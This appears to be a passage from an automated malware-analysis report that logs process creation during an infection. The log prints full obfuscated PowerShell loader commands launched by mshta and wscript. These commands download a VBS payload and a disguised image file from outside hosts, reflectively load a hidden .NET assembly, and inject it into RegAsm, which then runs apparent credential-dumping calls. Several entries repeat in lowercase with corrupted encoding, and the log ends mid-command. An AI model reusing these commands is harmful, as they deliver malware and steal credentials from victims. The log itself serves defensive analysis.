                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\sknmngfy\sknmngfy.cmdline"Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seethebestpricewithgoodcookiesm.vbS" Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES3EB6.tmp" "c:\Users\user\AppData\Local\Temp\sknmngfy\CSCD0FFB283197417ABFDFF0C5A9D2FBA3.TMP"Jump to behavior
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCd0ZycrJzRpbWFnZVVybCA9IE5sTGh0dCcrJ3BzOi8vJysncmF3LmdpdGh1YnVzZXJjbycrJ250ZW50LmNvbS9DcnlwdGVyc0FuZFRvb2xzT2ZpY2lhbC9aSVAvcmVmcy9oZScrJ2FkJysncy9tYWluL0QnKydldGFoTm90ZV9WLmpwZyBObEw7dGc0d2ViQ2xpZW50ID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDt0ZzRpbWFnZUInKyd5dGVzID0gdGc0d2ViQ2xpZW50LkRvd25sb2EnKydkRGF0YSh0ZzRpbWFnZVVybCk7dGc0aW1hZ2VUZXh0ID0gW1N5c3RlbS5UZXh0LkVuY29kJysnaW5nXTo6VVRGOC5HZXRTdHJpbmcodGc0aW1hZ2VCeXRlcyk7dGc0c3RhcnRGbGFnID0gTmxMPDxCQVNFNjRfU1RBUlQ+Pk5sJysnTDt0ZzRlbmRGbGFnID0gTmxMPDxCQVMnKydFNjRfRU5EPj5ObEw7dCcrJ2c0c3RhcnRJbmRleCA9IHRnNGltYWdlVGV4dC5JbmRleE9mKHRnNHN0YXJ0RmxhZyk7dGc0ZW5kSW5kZXggPSB0ZzRpbWFnZVQnKydleHQuSW5kZXhPZih0ZzRlbmRGbGFnKTt0ZzRzdGFydEluZGV4JysnIC1nJysnZSAwIC1hbmQgdGc0ZW5kSW5kZXggLWd0IHRnNHN0YXJ0SW5kZXg7dGc0cycrJ3RhcnRJbmRleCArPSB0ZzRzdGFydEZsYWcuTGVuZ3RoO3RnNGJhc2U2NExlbmd0aCA9IHRnNGVuZEluZGV4IC0gdGc0c3RhcnRJbmRleDt0ZzRiYXNlNjRDb21tYW5kJysnID0gdGc0aW1hZ2VUZXh0LlN1YnN0cmluZygnKyd0ZzRzdGFydEluZGV4LCB0ZzRiYXNlNjRMZW5ndGgpO3RnNGNvbW1hbmRCeXRlcyA9IFtTeXN0ZW0uQ29udmVydCcrJ106OkYnKydyb21CYXNlNjRTdHJpbmcodGc0YmFzZTY0Q29tbWFuZCk7dGc0bG9hZGVkQXNzZW1ibCcrJ3kgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKHRnNGNvbW1hbmRCeScrJ3RlJysncyk7dGc0dmFpTWV0aG9kID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZChObExWQScrJ0lObEwpO3RnNHZhaScrJ01ldGhvZCcrJy5JbnZva2UodGc0bnVsbCwgQChObCcrJ0x0eHQuRUNDRlJSLzA1NC8wNC4wMjIuMy4yOTEvLzpwdHRoTmwnKydMLCBObExkZXNhdCcrJ2l2YWRvTicrJ2xMLCBObExkZXNhdGl2YWRvTmxMLCBObExkZXNhdGl2YWRvTmxMLCBObExSZWdBc21ObEwsIE5sTGRlc2F0aXZhZG9ObEwsIE5sTGRlc2F0aXZhZG9ObEwpKTsnKS5SRVBsQWNlKCd0ZzQnLFtzVHJJbkddW2NoQXJdMzYpLlJFUGxBY2UoKFtjaEFyXTc4K1tjaEFyXTEwOCtbY2hBcl03NiksW3NUckluR11bY2hBcl0zOSkgfCAuICgoZ1YgJypNZFIqJykuTmFtZVszLDExLDJdLUpvSU4nJyk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxDJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('tg'+'4imageUrl = NlLhtt'+'ps://'+'raw.githubuserco'+'ntent.com/CryptersAndToolsOficial/ZIP/refs/he'+'ad'+'s/main/D'+'etahNote_V.jpg NlL;tg4webClient = New-Object System.Net.WebClient;tg4imageB'+'ytes = tg4webClient.Downloa'+'dData(tg4imageUrl);tg4imageText = [System.Text.Encod'+'ing]::UTF8.GetString(tg4imageBytes);tg4startFlag = NlL<<BASE64_START>>Nl'+'L;tg4endFlag = NlL<<BAS'+'E64_END>>NlL;t'+'g4startIndex = tg4imageText.IndexOf(tg4startFlag);tg4endIndex = tg4imageT'+'ext.IndexOf(tg4endFlag);tg4startIndex'+' -g'+'e 0 -and tg4endIndex -gt tg4startIndex;tg4s'+'tartIndex += tg4startFlag.Length;tg4base64Length = tg4endIndex - tg4startIndex;tg4base64Command'+' = tg4imageText.Substring('+'tg4startIndex, tg4base64Length);tg4commandBytes = [System.Convert'+']::F'+'romBase64String(tg4base64Command);tg4loadedAssembl'+'y = [System.Reflection.Assembly]::Load(tg4commandBy'+'te'+'s);tg4vaiMethod = [dnlib.IO.Home].GetMethod(NlLVA'+'INlL);tg4vai'+'Method'+'.Invoke(tg4null, @(Nl'+'Ltxt.ECCFRR/054/04.022.3.291//:ptthNl'+'L, NlLdesat'+'ivadoN'+'lL, NlLdesativadoNlL, NlLdesativadoNlL, NlLRegAsmNlL, NlLdesativadoNlL, NlLdesativadoNlL));').REPlAce('tg4',[sTrInG][chAr]36).REPlAce(([chAr]78+[chAr]108+[chAr]76),[sTrInG][chAr]39) | . ((gV '*MdR*').Name[3,11,2]-JoIN'')"Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"Jump to behavior
                  Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SYSTEM32\wInDoWspoWERsheLl\v1.0\pOwerSHelL.EXe" "PowErsheLl.ExE -Ex byPaSs -nop -W 1 -c DevicECrEdentiaLdEploymeNt.eXe ; IEx($(IeX('[SYStEm.tEXt.enCoDing]'+[cHaR]58+[chaR]58+'Utf8.gEtsTRiNg([sYstEM.CoNVErT]'+[cHar]58+[ChaR]0x3a+'FromBaSE64sTrIng('+[chAR]34+'JEcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFERC10WVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTUVNYkVyZGVmaW5JdGlPTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVybG1vTiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBHbWZScFV0LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUE1kWHZOLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRnQsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYXh4c2lBU0hmLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeEhXU3kpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiZ3VNcGJiZUdkVyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OQW1lU1BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG9NenpHY015TiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJEc6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMy4yMjAuNDAvNDUwL3NlZXRoZWJlc3RwcmljZXdpdGhnb29kY29va2llc21lLnRJRiIsIiRFblY6QVBQREFUQVxzZWV0aGViZXN0cHJpY2V3aXRoZ29vZGNvb2tpZXNtLnZiUyIsMCwwKTtzVGFSVC1zTGVlUCgzKTtTVGFSVCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlTlY6QVBQREFUQVxzZWV0aGViZXN0cHJpY2V3aXRoZ29vZGNvb2tpZXNtLnZiUyI='+[ChAr]0X22+'))')))"Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex byPaSs -nop -W 1 -c DevicECrEdentiaLdEploymeNt.eXe
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\lrugk233\lrugk233.cmdline"
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seethebestpricewithgoodcookiesm.vbS"
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\yrecugakrnvunuylxcgmffi"
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\jurvurlefvnzyimponaoqrckug"
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\toxfvjwftdfeaoitxynhtwpbdvhxj"
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES8131.tmp" "c:\Users\user\AppData\Local\Temp\lrugk233\CSC866FCE414411468EBBBEC22B5654CE3.TMP"
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCd0ZycrJzRpbWFnZVVybCA9IE5sTGh0dCcrJ3BzOi8vJysncmF3LmdpdGh1YnVzZXJjbycrJ250ZW50LmNvbS9DcnlwdGVyc0FuZFRvb2xzT2ZpY2lhbC9aSVAvcmVmcy9oZScrJ2FkJysncy9tYWluL0QnKydldGFoTm90ZV9WLmpwZyBObEw7dGc0d2ViQ2xpZW50ID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDt0ZzRpbWFnZUInKyd5dGVzID0gdGc0d2ViQ2xpZW50LkRvd25sb2EnKydkRGF0YSh0ZzRpbWFnZVVybCk7dGc0aW1hZ2VUZXh0ID0gW1N5c3RlbS5UZXh0LkVuY29kJysnaW5nXTo6VVRGOC5HZXRTdHJpbmcodGc0aW1hZ2VCeXRlcyk7dGc0c3RhcnRGbGFnID0gTmxMPDxCQVNFNjRfU1RBUlQ+Pk5sJysnTDt0ZzRlbmRGbGFnID0gTmxMPDxCQVMnKydFNjRfRU5EPj5ObEw7dCcrJ2c0c3RhcnRJbmRleCA9IHRnNGltYWdlVGV4dC5JbmRleE9mKHRnNHN0YXJ0RmxhZyk7dGc0ZW5kSW5kZXggPSB0ZzRpbWFnZVQnKydleHQuSW5kZXhPZih0ZzRlbmRGbGFnKTt0ZzRzdGFydEluZGV4JysnIC1nJysnZSAwIC1hbmQgdGc0ZW5kSW5kZXggLWd0IHRnNHN0YXJ0SW5kZXg7dGc0cycrJ3RhcnRJbmRleCArPSB0ZzRzdGFydEZsYWcuTGVuZ3RoO3RnNGJhc2U2NExlbmd0aCA9IHRnNGVuZEluZGV4IC0gdGc0c3RhcnRJbmRleDt0ZzRiYXNlNjRDb21tYW5kJysnID0gdGc0aW1hZ2VUZXh0LlN1YnN0cmluZygnKyd0ZzRzdGFydEluZGV4LCB0ZzRiYXNlNjRMZW5ndGgpO3RnNGNvbW1hbmRCeXRlcyA9IFtTeXN0ZW0uQ29udmVydCcrJ106OkYnKydyb21CYXNlNjRTdHJpbmcodGc0YmFzZTY0Q29tbWFuZCk7dGc0bG9hZGVkQXNzZW1ibCcrJ3kgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKHRnNGNvbW1hbmRCeScrJ3RlJysncyk7dGc0dmFpTWV0aG9kID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZChObExWQScrJ0lObEwpO3RnNHZhaScrJ01ldGhvZCcrJy5JbnZva2UodGc0bnVsbCwgQChObCcrJ0x0eHQuRUNDRlJSLzA1NC8wNC4wMjIuMy4yOTEvLzpwdHRoTmwnKydMLCBObExkZXNhdCcrJ2l2YWRvTicrJ2xMLCBObExkZXNhdGl2YWRvTmxMLCBObExkZXNhdGl2YWRvTmxMLCBObExSZWdBc21ObEwsIE5sTGRlc2F0aXZhZG9ObEwsIE5sTGRlc2F0aXZhZG9ObEwpKTsnKS5SRVBsQWNlKCd0ZzQnLFtzVHJJbkddW2NoQXJdMzYpLlJFUGxBY2UoKFtjaEFyXTc4K1tjaEFyXTEwOCtbY2hBcl03NiksW3NUckluR11bY2hBcl0zOSkgfCAuICgoZ1YgJypNZFIqJykuTmFtZVszLDExLDJdLUpvSU4nJyk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('tg'+'4imageUrl = NlLhtt'+'ps://'+'raw.githubuserco'+'ntent.com/CryptersAndToolsOficial/ZIP/refs/he'+'ad'+'s/main/D'+'etahNote_V.jpg NlL;tg4webClient = New-Object System.Net.WebClient;tg4imageB'+'ytes = tg4webClient.Downloa'+'dData(tg4imageUrl);tg4imageText = [System.Text.Encod'+'ing]::UTF8.GetString(tg4imageBytes);tg4startFlag = NlL<<BASE64_START>>Nl'+'L;tg4endFlag = NlL<<BAS'+'E64_END>>NlL;t'+'g4startIndex = tg4imageText.IndexOf(tg4startFlag);tg4endIndex = tg4imageT'+'ext.IndexOf(tg4endFlag);tg4startIndex'+' -g'+'e 0 -and tg4endIndex -gt tg4startIndex;tg4s'+'tartIndex += tg4startFlag.Length;tg4base64Length = tg4endIndex - tg4startIndex;tg4base64Command'+' = tg4imageText.Substring('+'tg4startIndex, tg4base64Length);tg4commandBytes = [System.Convert'+']::F'+'romBase64String(tg4base64Command);tg4loadedAssembl'+'y = [System.Reflection.Assembly]::Load(tg4commandBy'+'te'+'s);tg4vaiMethod = [dnlib.IO.Home].GetMethod(NlLVA'+'INlL);tg4vai'+'Method'+'.Invoke(tg4null, @(Nl'+'Ltxt.ECCFRR/054/04.022.3.291//:ptthNl'+'L, NlLdesat'+'ivadoN'+'lL, NlLdesativadoNlL, NlLdesativadoNlL, NlLRegAsmNlL, NlLdesativadoNlL, NlLdesativadoNlL));').REPlAce('tg4',[sTrInG][chAr]36).REPlAce(([chAr]78+[chAr]108+[chAr]76),[sTrInG][chAr]39) | . ((gV '*MdR*').Name[3,11,2]-JoIN'')"
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                  Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "powershell.exe -ex bypass -nop -w 1 -c devicecredentialdeployment.exe ; iex($(iex('[system.text.encoding]'+[char]58+[char]58+'utf8.getstring([system.convert]'+[char]58+[char]0x3a+'frombase64string('+[char]34+'jecgicagicagicagicagicagicagicagicagicagicagid0gicagicagicagicagicagicagicagicagicagicagigferc10wvblicagicagicagicagicagicagicagicagicagicagicattuvnykvyzgvmaw5jdglptiagicagicagicagicagicagicagicagicagicagicagj1tebgxjbxbvcnqoinvybg1vtiisicagicagicagicagicagicagicagicagicagicagicbdagfyu2v0id0gq2hhclnldc5vbmljb2rlkv1wdwjsawmgc3rhdgljigv4dgvybibjbnrqdhigvvjmrg93bmxvywrub0zpbguosw50uhryicagicagicagicagicagicagicagicagicagicagicbhbwzscfv0lhn0cmluzyagicagicagicagicagicagicagicagicagicagicague1kwhzolhn0cmluzyagicagicagicagicagicagicagicagicagicagicagrnqsdwludcagicagicagicagicagicagicagicagicagicagicagyxh4c2lbu0hmleludfb0ciagicagicagicagicagicagicagicagicagicagicageehxu3kpoycgicagicagicagicagicagicagicagicagicagicagic1oyu1licagicagicagicagicagicagicagicagicagicagicaiz3vncgjizudkvyigicagicagicagicagicagicagicagicagicagicagic1oqw1lu1bhy2ugicagicagicagicagicagicagicagicagicagicagig9nenphy015tiagicagicagicagicagicagicagicagicagicagicaglvbhc3nuahj1oyagicagicagicagicagicagicagicagicagicagicagjec6olvstervd25sb2fkvg9gawxlkdasimh0dha6ly8xotiumy4ymjaundavnduwl3nlzxrozwjlc3rwcmljzxdpdghnb29ky29va2llc21llnrjriisiirfbly6qvbqrefuqvxzzwv0agvizxn0chjpy2v3axroz29vzgnvb2tpzxntlnziuyismcwwkttzvgfsvc1ztgvlucgzktttvgfsvcagicagicagicagicagicagicagicagicagicagicagiirltly6qvbqrefuqvxzzwv0agvizxn0chjpy2v3axroz29vzgnvb2tpzxntlnziuyi='+[char]0x22+'))')))"
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command $codigo = 'kcd0zycrjzrpbwfnzvvybca9ie5stgh0dccrj3bzoi8vjysncmf3lmdpdgh1ynvzzxjjbycrj250zw50lmnvbs9dcnlwdgvyc0fuzfrvb2xzt2zpy2lhbc9asvavcmvmcy9ozscrj2fkjysncy9tywlul0qnkydldgfotm90zv9wlmpwzybobew7dgc0d2viq2xpzw50id0gtmv3lu9iamvjdcbtexn0zw0utmv0lldlyknsawvuddt0zzrpbwfnzuinkyd5dgvzid0gdgc0d2viq2xpzw50lkrvd25sb2enkydkrgf0ysh0zzrpbwfnzvvybck7dgc0aw1hz2vuzxh0id0gw1n5c3rlbs5uzxh0lkvuy29kjysnaw5nxto6vvrgoc5hzxrtdhjpbmcodgc0aw1hz2vcexrlcyk7dgc0c3rhcnrgbgfnid0gtmxmpdxcqvnfnjrfu1rbulq+pk5sjysntdt0zzrlbmrgbgfnid0gtmxmpdxcqvmnkydfnjrfru5epj5obew7dccrj2c0c3rhcnrjbmrleca9ihrnngltywdlvgv4dc5jbmrlee9mkhrnnhn0yxj0rmxhzyk7dgc0zw5ksw5kzxggpsb0zzrpbwfnzvqnkydlehqusw5kzxhpzih0zzrlbmrgbgfnktt0zzrzdgfydeluzgv4jysnic1njysnzsawic1hbmqgdgc0zw5ksw5kzxgglwd0ihrnnhn0yxj0sw5kzxg7dgc0cycrj3rhcnrjbmrlecarpsb0zzrzdgfydezsywcutgvuz3roo3rnngjhc2u2nexlbmd0aca9ihrnngvuzeluzgv4ic0gdgc0c3rhcnrjbmrledt0zzriyxnlnjrdb21tyw5kjysnid0gdgc0aw1hz2vuzxh0lln1ynn0cmluzygnkyd0zzrzdgfydeluzgv4lcb0zzriyxnlnjrmzw5ndggpo3rnngnvbw1hbmrcexrlcya9ifttexn0zw0uq29udmvydccrj106okynkydyb21cyxnlnjrtdhjpbmcodgc0ymfzzty0q29tbwfuzck7dgc0bg9hzgvkqxnzzw1ibccrj3kgpsbbu3lzdgvtlljlzmxly3rpb24uqxnzzw1ibhldojpmb2fkkhrnngnvbw1hbmrcescrj3rljysncyk7dgc0dmfptwv0ag9kid0gw2rubglilklplkhvbwvdlkdlde1ldghvzchobexwqscrj0lobewpo3rnnhzhascrj01ldghvzccrjy5jbnzva2uodgc0bnvsbcwgqchobccrj0x0ehqurundrljslza1nc8wnc4wmjiumy4yotevlzpwdhrotmwnkydmlcbobexkzxnhdccrj2l2ywrvticrj2xmlcbobexkzxnhdgl2ywrvtmxmlcbobexkzxnhdgl2ywrvtmxmlcbobexszwdbc21obewsie5stgrlc2f0axzhzg9obewsie5stgrlc2f0axzhzg9obewpktsnks5srvbsqwnlkcd0zzqnlftzvhjjbkddw2noqxjdmzyplljfugxby2uokftjaefyxtc4k1tjaefyxtewoctby2hbcl03niksw3nucklur11by2hbcl0zoskgfcauicgoz1ygjypnzfiqjykutmftzvszldexldjdlupvsu4njyk=';$owjuxd = [system.text.encoding]::utf8.getstring([system.convert]::frombase64string($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -noprofile -command $owjuxd
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -noprofile -command "('tg'+'4imageurl = nllhtt'+'ps://'+'raw.githubuserco'+'ntent.com/cryptersandtoolsoficial/zip/refs/he'+'ad'+'s/main/d'+'etahnote_v.jpg nll;tg4webclient = new-object system.net.webclient;tg4imageb'+'ytes = tg4webclient.downloa'+'ddata(tg4imageurl);tg4imagetext = [system.text.encod'+'ing]::utf8.getstring(tg4imagebytes);tg4startflag = nll<<base64_start>>nl'+'l;tg4endflag = nll<<bas'+'e64_end>>nll;t'+'g4startindex = tg4imagetext.indexof(tg4startflag);tg4endindex = tg4imaget'+'ext.indexof(tg4endflag);tg4startindex'+' -g'+'e 0 -and tg4endindex -gt tg4startindex;tg4s'+'tartindex += tg4startflag.length;tg4base64length = tg4endindex - tg4startindex;tg4base64command'+' = tg4imagetext.substring('+'tg4startindex, tg4base64length);tg4commandbytes = [system.convert'+']::f'+'rombase64string(tg4base64command);tg4loadedassembl'+'y = [system.reflection.assembly]::load(tg4commandby'+'te'+'s);tg4vaimethod = [dnlib.io.home].getmethod(nllva'+'inll);tg4vai'+'method'+'.invoke(tg4null, @(nl'+'ltxt.eccfrr/054/04.022.3.291//:ptthnl'+'l, nlldesat'+'ivadon'+'ll, nlldesativadonll, nlldesativadonll, nllregasmnll, nlldesativadonll, nlldesativadonll));').replace('tg4',[string][char]36).replace(([char]78+[char]108+[char]76),[string][char]39) | . ((gv '*mdr*').name[3,11,2]-join'')"
                  Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "powershell.exe -ex bypass -nop -w 1 -c devicecredentialdeployment.exe ; iex($(iex('[system.text.encoding]'+[char]58+[char]58+'utf8.getstring([system.convert]'+[char]58+[char]0x3a+'frombase64string('+[char]34+'jecgicagicagicagicagicagicagicagicagicagicagid0gicagicagicagicagicagicagicagicagicagicagigferc10wvblicagicagicagicagicagicagicagicagicagicagicattuvnykvyzgvmaw5jdglptiagicagicagicagicagicagicagicagicagicagicagj1tebgxjbxbvcnqoinvybg1vtiisicagicagicagicagicagicagicagicagicagicagicbdagfyu2v0id0gq2hhclnldc5vbmljb2rlkv1wdwjsawmgc3rhdgljigv4dgvybibjbnrqdhigvvjmrg93bmxvywrub0zpbguosw50uhryicagicagicagicagicagicagicagicagicagicagicbhbwzscfv0lhn0cmluzyagicagicagicagicagicagicagicagicagicagicague1kwhzolhn0cmluzyagicagicagicagicagicagicagicagicagicagicagrnqsdwludcagicagicagicagicagicagicagicagicagicagicagyxh4c2lbu0hmleludfb0ciagicagicagicagicagicagicagicagicagicagicageehxu3kpoycgicagicagicagicagicagicagicagicagicagicagic1oyu1licagicagicagicagicagicagicagicagicagicagicaiz3vncgjizudkvyigicagicagicagicagicagicagicagicagicagicagic1oqw1lu1bhy2ugicagicagicagicagicagicagicagicagicagicagig9nenphy015tiagicagicagicagicagicagicagicagicagicagicaglvbhc3nuahj1oyagicagicagicagicagicagicagicagicagicagicagjec6olvstervd25sb2fkvg9gawxlkdasimh0dha6ly8xotiumy4ymjaundavnduwl3nlzxrozwjlc3rwcmljzxdpdghnb29ky29va2llc21llnrjriisiirfbly6qvbqrefuqvxzzwv0agvizxn0chjpy2v3axroz29vzgnvb2tpzxntlnziuyismcwwkttzvgfsvc1ztgvlucgzktttvgfsvcagicagicagicagicagicagicagicagicagicagicagiirltly6qvbqrefuqvxzzwv0agvizxn0chjpy2v3axroz29vzgnvb2tpzxntlnziuyi='+[char]0x22+'))')))"
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command $codigo = 'kcd0zycrjzrpbwfnzvvybca9ie5stgh0dccrj3bzoi8vjysncmf3lmdpdgh1ynvzzxjjbycrj250zw50lmnvbs9dcnlwdgvyc0fuzfrvb2xzt2zpy2lhbc9asvavcmvmcy9ozscrj2fkjysncy9tywlul0qnkydldgfotm90zv9wlmpwzybobew7dgc0d2viq2xpzw50id0gtmv3lu9iamvjdcbtexn0zw0utmv0lldlyknsawvuddt0zzrpbwfnzuinkyd5dgvzid0gdgc0d2viq2xpzw50lkrvd25sb2enkydkrgf0ysh0zzrpbwfnzvvybck7dgc0aw1hz2vuzxh0id0gw1n5c3rlbs5uzxh0lkvuy29kjysnaw5nxto6vvrgoc5hzxrtdhjpbmcodgc0aw1hz2vcexrlcyk7dgc0c3rhcnrgbgfnid0gtmxmpdxcqvnfnjrfu1rbulq+pk5sjysntdt0zzrlbmrgbgfnid0gtmxmpdxcqvmnkydfnjrfru5epj5obew7dccrj2c0c3rhcnrjbmrleca9ihrnngltywdlvgv4dc5jbmrlee9mkhrnnhn0yxj0rmxhzyk7dgc0zw5ksw5kzxggpsb0zzrpbwfnzvqnkydlehqusw5kzxhpzih0zzrlbmrgbgfnktt0zzrzdgfydeluzgv4jysnic1njysnzsawic1hbmqgdgc0zw5ksw5kzxgglwd0ihrnnhn0yxj0sw5kzxg7dgc0cycrj3rhcnrjbmrlecarpsb0zzrzdgfydezsywcutgvuz3roo3rnngjhc2u2nexlbmd0aca9ihrnngvuzeluzgv4ic0gdgc0c3rhcnrjbmrledt0zzriyxnlnjrdb21tyw5kjysnid0gdgc0aw1hz2vuzxh0lln1ynn0cmluzygnkyd0zzrzdgfydeluzgv4lcb0zzriyxnlnjrmzw5ndggpo3rnngnvbw1hbmrcexrlcya9ifttexn0zw0uq29udmvydccrj106okynkydyb21cyxnlnjrtdhjpbmcodgc0ymfzzty0q29tbwfuzck7dgc0bg9hzgvkqxnzzw1ibccrj3kgpsbbu3lzdgvtlljlzmxly3rpb24uqxnzzw1ibhldojpmb2fkkhrnngnvbw1hbmrcescrj3rljysncyk7dgc0dmfptwv0ag9kid0gw2rubglilklplkhvbwvdlkdlde1ldghvzchobexwqscrj0lobewpo3rnnhzhascrj01ldghvzccrjy5jbnzva2uodgc0bnvsbcwgqchobccrj0x0ehqurundrljslza1nc8wnc4wmjiumy4yotevlzpwdhrotmwnkydmlcbobexkzxnhdccrj2l2ywrvticrj2xmlcbobexkzxnhdgl2ywrvtmxmlcbobexkzxnhdgl2ywrvtmxmlcbobexszwdbc21obewsie5stgrlc2f0axzhzg9obewsie5stgrlc2f0axzhzg9obewpktsnks5srvbsqwnlkcd0zzqnlftzvhjjbkddw2noqxjdmzyplljfugxby2uokftjaefyxtc4k1tjaefyxtewoctby2hbcl03niksw3nucklur11by2hbcl0zoskgfcauicgoz1ygjypnzfiqjykutmftzvszldexldjdlupvsu4njyk=';$owjuxd = 